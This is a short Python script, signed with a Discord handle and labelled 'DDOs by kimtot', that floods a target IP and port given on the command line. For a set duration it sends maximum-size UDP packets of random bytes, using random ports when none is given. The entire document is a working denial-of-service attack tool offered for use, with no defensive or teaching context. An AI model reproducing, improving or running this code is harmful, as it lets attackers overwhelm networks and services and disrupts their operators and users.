#!/usr/bin/python

#DDOs by kimtot
#Discord: !kimtot#9999


import socket,random,sys,time



if len(sys.argv)==1:
    print('')
    print('||| kimtot ddos |||')
    print('     Discord: kimtot#9999 ')
    print('')
    sys.exit('Syntax: ./error IP port time')



def udp_socket_extention():

    port = int(sys.argv[2])

    randport=(True,False)[port==0]

    ip = sys.argv[1]

    dur = int(sys.argv[3])

    clock=(lambda:0,time.clock)[dur>0]

    duration=(1,(clock()+dur))[dur>0]
	
    print('')
    print('||| kimtot ddos |||')
    print('     Discord: kimtot#9999')
    print('')
    print('   kimtot ddos...')
	
	
    sock=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)

    bytes=random._urandom(65507)

    while True:

        port=(random.randint(1000,9999),port)[randport]

        if clock()<duration:

            sock.sendto(bytes,(ip,port))

        else:

            break

    

udp_socket_extention()
